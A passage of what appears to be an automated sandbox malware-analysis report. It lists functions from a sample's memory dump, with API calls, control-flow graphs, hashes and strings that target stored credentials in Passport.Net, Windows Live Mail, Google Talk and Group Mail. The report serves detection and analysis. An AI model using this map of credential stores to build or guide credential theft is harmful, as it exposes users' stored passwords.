                      • RegCloseKey.KERNELBASE(?,?,?,?,?,00403E7F,?), ref: 0040FC31
                      Strings
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: CloseOpen$memcpy$AddressEnumFreeLibraryLoadLocalProcQueryValuememset
                      • String ID: Dynamic Salt$Software\Microsoft\IdentityCRL$Value$XnE
                      • API String ID: 2768085393-2409096184
                      • Opcode ID: 450d76980a5b045f2fe885eff3fb720ced70e3f8b230ed55941267a192e7c898
                      • Instruction ID: dc42a4d3869b5799c80e2b369f36587618a74ee4c7744a3ab9dbe2425e101413
                      • Opcode Fuzzy Hash: 450d76980a5b045f2fe885eff3fb720ced70e3f8b230ed55941267a192e7c898
                      • Instruction Fuzzy Hash: BA316F72508348AFE750DF51DC81E5BBBECFB88358F04093EBA94E2151D735D9188B6A
                      Function 004442EA Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 97stringCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      APIs
                      • memset.MSVCRT ref: 0044430B
                        • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075A0
                        • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075AB
                        • Part of subcall function 0040759E: _mbscat.MSVCRT ref: 004075C2
                        • Part of subcall function 00410DBB: memset.MSVCRT ref: 00410E10
                        • Part of subcall function 00410DBB: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000104), ref: 00410E79
                        • Part of subcall function 00410DBB: _mbscpy.MSVCRT ref: 00410E87
                      • memset.MSVCRT ref: 00444379
                      • memset.MSVCRT ref: 00444394
                        • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                      • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000000,00000104,00000104,?,?,?,?), ref: 004443CD
                      • strlen.MSVCRT ref: 004443DB
                      • _strcmpi.MSVCRT ref: 00444401
                      Strings
                      • Store Root, xrefs: 004443A5
                      • Software\Microsoft\Windows Live Mail, xrefs: 004443AA
                      • \Microsoft\Windows Live Mail, xrefs: 00444350
                      • \Microsoft\Windows Mail, xrefs: 00444329
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: memset$strlen$Close$EnvironmentExpandStrings_mbscat_mbscpy_strcmpi
                      • String ID: Software\Microsoft\Windows Live Mail$Store Root$\Microsoft\Windows Live Mail$\Microsoft\Windows Mail
                      • API String ID: 832325562-2578778931
                      • Opcode ID: 88eecb5596c8840dacdab9e6d9cddf85e53b3344e0b54babe6c18053d28390f2
                      • Instruction ID: c969096c6c8075cae9da81fbffcb27ba025b1fc1210c9b39c3855a2ab2b3ab2e
                      • Opcode Fuzzy Hash: 88eecb5596c8840dacdab9e6d9cddf85e53b3344e0b54babe6c18053d28390f2
                      • Instruction Fuzzy Hash: A73197725083446BE320EA99DC47FCBB7DC9B85315F14441FF64897182D678E548877A
                      Function 0040F460 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 180registryCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 308 40f460-40f5bd memset * 2 call 4078ba * 2 RegOpenKeyExA 313 40f5c3-40f5ea RegQueryValueExA 308->313 314 40f6d9-40f6df 308->314 315 40f6d0-40f6d3 RegCloseKey 313->315 316 40f5f0-40f5f4 313->316 315->314 316->315 317 40f5fa-40f604 316->317 318 40f606-40f618 call 40466b call 404734 317->318 319 40f677 317->319 329 40f66a-40f675 call 404785 318->329 330 40f61a-40f63e call 4047a5 318->330 321 40f67a-40f67d 319->321 321->315 322 40f67f-40f6bf call 4012ee RegQueryValueExA 321->322 322->315 328 40f6c1-40f6cf 322->328 328->315 329->321 330->329 335 40f640-40f643 330->335 336 40f661-40f664 LocalFree 335->336 337 40f645-40f65a memcpy 335->337 336->329 337->336
                      APIs
                      • memset.MSVCRT ref: 0040F567
                      • memset.MSVCRT ref: 0040F57F
                        • Part of subcall function 004078BA: _mbsnbcat.MSVCRT ref: 004078DA
                      • RegOpenKeyExA.KERNELBASE(80000001,00000082,00000000,00020019,?,?,?,?,?,00000000), ref: 0040F5B5
                      • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000082,?,?,?,?,00000000), ref: 0040F5E2
                      • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,000000BE,000000BE,?,?,?,?,00000000), ref: 0040F6B7
                        • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                        • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                        • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                      • memcpy.MSVCRT ref: 0040F652
                      • LocalFree.KERNEL32(?,?,00000000,?,?,?,?,?,00000000), ref: 0040F664
                      • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000), ref: 0040F6D3
                      Strings
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: QueryValuememset$AddressCloseFreeLibraryLoadLocalOpenProc_mbscpy_mbsnbcatmemcpy
                      • String ID:
                      • API String ID: 2012582556-3916222277
                      • Opcode ID: 2cdd3cefc8e37eb3b1e9bdc7d6d5fe14681a0691d37703b2182bb496bc4646ff
                      • Instruction ID: 8a535e2a1d92942c08e22e27bc62a3a9d9c5418ddd7b2e408e782496f1cf9495
                      • Opcode Fuzzy Hash: 2cdd3cefc8e37eb3b1e9bdc7d6d5fe14681a0691d37703b2182bb496bc4646ff
                      • Instruction Fuzzy Hash: 9E81FC218047CEDEDB31DBBC8C485DDBF745B17224F0843A9E5B47A2E2D3245646C7AA
                      Function 004037CA Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 86stringCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 338 4037ca-40381c memset * 2 call 444551 341 4038e2-4038e5 338->341 342 403822-403882 call 4021b6 call 406f06 * 2 strchr 338->342 349 403884-403895 _mbscpy 342->349 350 403897-4038a2 strlen 342->350 351 4038bf-4038dd _mbscpy call 4023e5 349->351 350->351 352 4038a4-4038bc sprintf 350->352 351->341 352->351
                      APIs
                      • memset.MSVCRT ref: 004037EB
                      • memset.MSVCRT ref: 004037FF
                        • Part of subcall function 00444551: memset.MSVCRT ref: 00444573
                        • Part of subcall function 00444551: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 004445DF
                        • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                        • Part of subcall function 00406F06: memcpy.MSVCRT ref: 00406F20
                      • strchr.MSVCRT ref: 0040386E
                      • _mbscpy.MSVCRT ref: 0040388B
                      • strlen.MSVCRT ref: 00403897
                      • sprintf.MSVCRT ref: 004038B7
                      • _mbscpy.MSVCRT ref: 004038CD
                      Strings
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: memset$_mbscpystrlen$Closememcpysprintfstrchr
                      • String ID: %s@yahoo.com
                      • API String ID: 317221925-3288273942
                      • Opcode ID: 94ee0ce22b792c256a50841e845a97cde8158fcf202da7b3a2aba60cc9f07639
                      • Instruction ID: 76d3f49adc6711096ede71316d8c54080aa8a6e72e6628a7d10ff16d2d587f45
                      • Opcode Fuzzy Hash: 94ee0ce22b792c256a50841e845a97cde8158fcf202da7b3a2aba60cc9f07639
                      • Instruction Fuzzy Hash: 4B2154B3D001285EEB11EA54DD42FDA77ACDF85308F0404EBB649F7041E678AF888A59
                      Function 00404A99 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 52libraryloaderwindowCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 354 404a99-404ac2 LoadLibraryA 355 404ac4-404ad2 GetProcAddress 354->355 356 404aec-404af4 354->356 357 404ad4-404ad8 355->357 358 404add-404ae6 FreeLibrary 355->358 361 404af5-404afa 356->361 362 404adb 357->362 358->356 360 404ae8-404aea 358->360 360->361 363 404b13-404b17 361->363 364 404afc-404b12 MessageBoxA 361->364 362->358
                      APIs
                      • LoadLibraryA.KERNEL32(comctl32.dll), ref: 00404AB8
                      • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404ACA
                      • FreeLibrary.KERNEL32(00000000), ref: 00404ADE
                      • MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
                      Strings
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: Library$AddressFreeLoadMessageProc
                      • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                      • API String ID: 2780580303-317687271
                      • Opcode ID: 7992fcdcafd7ff6fedb2cae98ddd2050c088282ff9ffca5c48e78306170b2e8e
                      • Instruction ID: 488ab604db7d7bb3946a6a0ddadc23e58717ff74c8dc9d9f2a6c2f93e1cc5ebb
                      • Opcode Fuzzy Hash: 7992fcdcafd7ff6fedb2cae98ddd2050c088282ff9ffca5c48e78306170b2e8e
                      • Instruction Fuzzy Hash: F401D679B512106BE7115BE59C89F6BBAACDB86759B040135BA02F1180DAB899018A5C
                      Function 004034E4 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 47COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 365 4034e4-403544 memset * 2 call 410b1e 368 403580-403582 365->368 369 403546-40357f _mbscpy call 406d55 _mbscat call 4033f0 365->369 369->368
                      APIs
                      • memset.MSVCRT ref: 00403504
                      • memset.MSVCRT ref: 0040351A
                        • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                      • _mbscpy.MSVCRT ref: 00403555
                        • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                        • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                      • _mbscat.MSVCRT ref: 0040356D
                      Strings
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: _mbscatmemset$Close_mbscpystrlen
                      • String ID: InstallPath$Software\Group Mail$fb.dat
                      • API String ID: 3071782539-966475738
                      • Opcode ID: ba1e5b879fdebbe75c382cc963f8f285cb869b8741e9311d789e5899e64a9370
                      • Instruction ID: a2fd564f6d67a76fe1541fb13c78ccc0c8ee6374decffd3371ae058987aad369
                      • Opcode Fuzzy Hash: ba1e5b879fdebbe75c382cc963f8f285cb869b8741e9311d789e5899e64a9370
                      • Instruction Fuzzy Hash: C201FC7694416875E750F6659C47FCAB66CCB64705F0400A7BA48F30C2DAF8BBC486A9
                      Function 0040F6E2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 97stringCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 374 40f6e2-40f70a call 40466b call 4045db 379 40f710-40f717 call 404734 374->379 380 40f7e9-40f801 call 404656 call 404785 374->380 379->380 385 40f71d-40f72e CredReadA 379->385 385->380 387 40f734-40f73a 385->387 389 40f740-40f743 387->389 390 40f7e5 387->390 389->390 391 40f749-40f759 389->391 390->380 392 40f75a-40f770 391->392 392->392 393 40f772-40f795 call 4047a5 392->393 396 40f7e2 393->396 397 40f797-40f7b6 WideCharToMultiByte 393->397 396->390 398 40f7b8-40f7c6 strlen 397->398 399 40f7d9-40f7dc LocalFree 397->399 398->399 400 40f7c8-40f7d8 _mbscpy 398->400 399->396 400->399
                      APIs
                        • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                        • Part of subcall function 004045DB: LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                        • Part of subcall function 004045DB: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                        • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                        • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                        • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                        • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                        • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                        • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                      • CredReadA.ADVAPI32(Passport.Net\*,00000004,00000000,?,?,00000000), ref: 0040F729
                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000100,000000FF,00000000,00000000,?,?,?,?,00000000), ref: 0040F7AE
                      • strlen.MSVCRT ref: 0040F7BE
                      • _mbscpy.MSVCRT ref: 0040F7CF
                      • LocalFree.KERNEL32(00000000,?,00000000), ref: 0040F7DC
                      Strings
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: AddressProc$LibraryLoad_mbscpy$ByteCharCredFreeLocalMultiReadWidestrlen
                      • String ID: Passport.Net\*
                      • API String ID: 4000595657-3671122194
                      • Opcode ID: 0af64cc57546a9fbf77b674907fee208d195fdaa1b5113e78288b1972eb9facf
                      • Instruction ID: cbd5109d0b46f6ae46d16b49076c688dceaf9cc559dd015bf255ce3d8649dee3
                      • Opcode Fuzzy Hash: 0af64cc57546a9fbf77b674907fee208d195fdaa1b5113e78288b1972eb9facf
                      • Instruction Fuzzy Hash: 98316F76900109ABDB10EFA6DD45DAEB7B9EF89300F10007BE605F7291DB389A04CB59
                      Function 0040CCD7 Relevance: 9.1, APIs: 6, Instructions: 71windowCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 401 40ccd7-40cd06 ??2@YAPAXI@Z 402 40cd08-40cd0d 401->402 403 40cd0f 401->403 404 40cd11-40cd24 ??2@YAPAXI@Z 402->404 403->404 405 40cd26-40cd2d call 404025 404->405 406 40cd2f 404->406 408 40cd31-40cd57 405->408 406->408 410 40cd66-40cdd9 call 407088 call 4019b5 memset LoadIconA call 4019b5 _mbscpy 408->410 411 40cd59-40cd60 DeleteObject 408->411 411->410
                      APIs
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: ??2@$DeleteIconLoadObject_mbscpymemset
                      • String ID:
                      • API String ID: 2054149589-0
                      • Opcode ID: ac2346bdc6bf8c69db932d73876581c2cd712649df4ebdee0f030b2719307f74
                      • Instruction ID: e49e2262ea613e2b532621416bf92f05b9d60d1a181aada648b692035ce2a44d
                      • Opcode Fuzzy Hash: ac2346bdc6bf8c69db932d73876581c2cd712649df4ebdee0f030b2719307f74
                      • Instruction Fuzzy Hash: C921A1B0900360DBDB10DF749DC97897BA8EB40B04F1405BBED08FF286D7B895408BA8
                      Function 004085D2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79registryCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      APIs
                        • Part of subcall function 004082CD: memset.MSVCRT ref: 0040832F
                        • Part of subcall function 004082CD: memset.MSVCRT ref: 00408343
                        • Part of subcall function 004082CD: memset.MSVCRT ref: 0040835F
                        • Part of subcall function 004082CD: memset.MSVCRT ref: 00408376
                        • Part of subcall function 004082CD: GetComputerNameA.KERNEL32(?,?), ref: 00408398
                        • Part of subcall function 004082CD: GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                        • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                        • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                        • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083E9
                        • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083F8
                        • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                      • memset.MSVCRT ref: 00408620
                        • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                      • memset.MSVCRT ref: 00408671
                      • RegCloseKey.ADVAPI32(?,?,?), ref: 004086AF
                      • RegCloseKey.ADVAPI32(?), ref: 004086D6
                      Strings
                      • Software\Google\Google Talk\Accounts, xrefs: 004085F1
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: memset$ByteCharCloseMultiNameWidestrlen$ComputerEnumOpenUser
                      • String ID: Software\Google\Google Talk\Accounts
                      • API String ID: 1366857005-1079885057
                      • Opcode ID: b24b9a54dcd0214932f6ac2563ed0d1b1cb372bdd45dc4bf833f1fe5ea734f55
                      • Instruction ID: c9a55fd20ea1a9e1148d2ba128c2c272dfe10edd9ec9a97c612e1cc238572be2
                      • Opcode Fuzzy Hash: b24b9a54dcd0214932f6ac2563ed0d1b1cb372bdd45dc4bf833f1fe5ea734f55
                      • Instruction Fuzzy Hash: 6E2181B140830AAEE610EF51DD42EAFB7DCEF94344F00083EB984D1192E675D95D9BAB
                      Function 0040BA28 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 72COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 441 40ba28-40ba3a 442 40ba87-40ba9b call 406c62 441->442 443 40ba3c-40ba52 call 407e20 _mbsicmp 441->443 465 40ba9d call 4107f1 442->465 466 40ba9d call 404734 442->466 467 40ba9d call 404785 442->467 468 40ba9d call 403c16 442->468 469 40ba9d call 410a9c 442->469 448 40ba54-40ba6d call 407e20 443->448 449 40ba7b-40ba85 443->449 455 40ba74 448->455 456 40ba6f-40ba72 448->456 449->442 449->443 451 40baa0-40bab3 call 407e30 457 40bab5-40bac1 451->457 458 40bafa-40bb09 SetCursor 451->458 459 40ba75-40ba76 call 40b5e5 455->459 456->459 460 40bac3-40bace 457->460 461 40bad8-40baf7 qsort 457->461 459->449 460->461 461->458 465->451 466->451 467->451 468->451 469->451
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: Cursor_mbsicmpqsort
                      • String ID: /nosort$/sort
                      • API String ID: 882979914-1578091866
                      • Opcode ID: eeec834885b89caefbd260ac574d55a400450caca1ca348474599114d02fe8b5
                      • Instruction ID: 8a1fc52e493d51bfa0df36ad286e8752cb28bf69c391dd95ac0f49afa8242728
                      • Opcode Fuzzy Hash: eeec834885b89caefbd260ac574d55a400450caca1ca348474599114d02fe8b5
                      • Instruction Fuzzy Hash: 2D2192B1704601EFD719AF75C880A69B7A9FF48318B10027EF419A7291CB39BC12CBD9
                      Function 00410DBB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 74registryCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00410D0E: LoadLibraryA.KERNEL32(shell32.dll,00410DCA,00000104), ref: 00410D1C
                        • Part of subcall function 00410D0E: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 00410D31
                      • memset.MSVCRT ref: 00410E10
                      • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000104), ref: 00410E79
                      • _mbscpy.MSVCRT ref: 00410E87
                        • Part of subcall function 004070AE: GetVersionExA.KERNEL32(0045A3B0,0000001A,00410DD9,00000104), ref: 004070C8
                      Strings
                      • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00410E2B, 00410E3B
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: AddressCloseLibraryLoadProcVersion_mbscpymemset
                      • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                      • API String ID: 889583718-2036018995
                      • Opcode ID: ed5743d336984a8c18282994424b44d0bcfcd120d49097e0ee850cbc5c972bb8
                      • Instruction ID: 345612a4203e2947e26158410096d7c3d27216bde768142914c78e2e12d87323
                      • Opcode Fuzzy Hash: ed5743d336984a8c18282994424b44d0bcfcd120d49097e0ee850cbc5c972bb8
                      • Instruction Fuzzy Hash: 89110D71C40318EBEB20B6D59C86EEF77ACDB14304F1404A7F555A2112E7BC9ED8C69A
                      Function 00410C68 Relevance: 6.1, APIs: 4, Instructions: 58COMMON
                      Download Yara Rule
                      APIs
                      • FindResourceA.KERNEL32(?,?,?), ref: 00410C75
                      • SizeofResource.KERNEL32(?,00000000), ref: 00410C86
                      • LoadResource.KERNEL32(?,00000000), ref: 00410C96
                      • LockResource.KERNEL32(00000000), ref: 00410CA1
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: Resource$FindLoadLockSizeof
                      • String ID:
                      • API String ID: 3473537107-0
                      • Opcode ID: bd954622ed218253ef2d1b1e463bd565b46b01af85fc050a190cf1e92aec0d28
                      • Instruction ID: 06b8370cebe37c7de172ca18b7cbf64f7437cd91f528590ddf6fb1777473d23a
                      • Opcode Fuzzy Hash: bd954622ed218253ef2d1b1e463bd565b46b01af85fc050a190cf1e92aec0d28
                      • Instruction Fuzzy Hash: 090196367012166F8B185F69DD9489F7EAEFB853913084136FC05C6361EB71C9818ED8
                      Function 004109CF Relevance: 6.1, APIs: 4, Instructions: 52COMMON
                      Download Yara Rule
                      APIs
                      • memset.MSVCRT ref: 004109F7
                        • Part of subcall function 004075CD: sprintf.MSVCRT ref: 00407605
                        • Part of subcall function 004075CD: memcpy.MSVCRT ref: 00407618
                      • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 00410A1B
                      • memset.MSVCRT ref: 00410A32
                      • GetPrivateProfileStringA.KERNEL32(?,?,0044C52F,?,00002000,?), ref: 00410A50
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: PrivateProfileStringmemset$Writememcpysprintf
                      • String ID:
                      • API String ID: 3143880245-0
                      • Opcode ID: 06440367014e030cd30049a245fb0cc3fb8be964b179c0619a4e1c6a0770dea7
                      • Instruction ID: 950c872411b2f2d44c5e3370b52dcf3132a88c3cdc41bb294f16927293e6b240
                      • Opcode Fuzzy Hash: 06440367014e030cd30049a245fb0cc3fb8be964b179c0619a4e1c6a0770dea7
                      • Instruction Fuzzy Hash: A401A172804319BBEF119F50DC86EDB7B7CEF05344F0000A6F604A2052E635AA64CBA9
                      Function 00408D34 Relevance: 5.0, APIs: 4, Instructions: 36COMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: ??2@
                      • String ID:
                      • API String ID: 1033339047-0
                      • Opcode ID: 13d41e296071d90ab44a737b93fda326391e3e8b074f3b81c3e25c1d737bd7ac
                      • Instruction ID: b7305a6f8e60e4354fc193aeb8e5872e67636dbc7b7f4d43fc505f02bd19535d
                      • Opcode Fuzzy Hash: 13d41e296071d90ab44a737b93fda326391e3e8b074f3b81c3e25c1d737bd7ac
                      • Instruction Fuzzy Hash: EEF031F05433615EEB559F34ED0672536A4E784302F024B3EE2059A2E6EB78D4908B09
                      Function 00406F30 Relevance: 4.5, APIs: 3, Instructions: 38COMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: ??3@mallocmemcpy
                      • String ID:
                      • API String ID: 3831604043-0
                      • Opcode ID: a96fb65c017a86587ba071467795d458f8ca9669e817bb347d51b960c43a4168
                      • Instruction ID: 20c18abb4fba39fec419649699297209b7413d51c31022bf8d4f5bc21a778af6
                      • Opcode Fuzzy Hash: a96fb65c017a86587ba071467795d458f8ca9669e817bb347d51b960c43a4168
                      • Instruction Fuzzy Hash: 39F0E9726092235FD7089E7AB881D0BB3ADEF94324711482FF445E7281D738EC60C6A8
                      Function 00407088 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 14COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00406FC7: memset.MSVCRT ref: 00406FD1
                        • Part of subcall function 00406FC7: _mbscpy.MSVCRT ref: 00407011
                      • CreateFontIndirectA.GDI32(?), ref: 004070A6
                      Strings
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: CreateFontIndirect_mbscpymemset
                      • String ID: Arial
                      • API String ID: 3853255127-493054409
                      • Opcode ID: a9edf0add2530cae1e73dc887b0500a6e6731c557fb9a9d8b72d1c15ab1f178d
                      • Instruction ID: 3e85f73e1de40fb669f60d67ce34a2ecc2b5129f84855d11383e820b071861b9
                      • Opcode Fuzzy Hash: a9edf0add2530cae1e73dc887b0500a6e6731c557fb9a9d8b72d1c15ab1f178d
                      • Instruction Fuzzy Hash: FDD0C9A0E4020D67D710F7A0FD47F49776C5B00604F510831B905F10E1EAA4A1184A99
                      Function 0044B3CF Relevance: 3.1, APIs: 2, Instructions: 100COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: ProtectVirtual
                      • String ID:
                      • API String ID: 544645111-0
                      • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                      • Instruction ID: 9d5022db8ba3b04779ac2e9664088e7462d9cf1087a2f4409b49694314ac1291
                      • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                      • Instruction Fuzzy Hash: FB21F7114496816FFB218BB84C017B67BD8DB13364F19469BE184CB243D76CD85693FA
                      Function 0040CE70 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 72COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00401E69: memset.MSVCRT ref: 00401E8B
                        • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EA4
                        • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EB2
                        • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EF8
                        • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401F06
                      • _strcmpi.MSVCRT ref: 0040CEC3
                      Strings
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: strlen$_strcmpimemset
                      • String ID: /stext
                      • API String ID: 520177685-3817206916
                      • Opcode ID: 8aa79a490ab9c6e021e7ced4863df28004c69c197a86612b5f6291033182a9ac
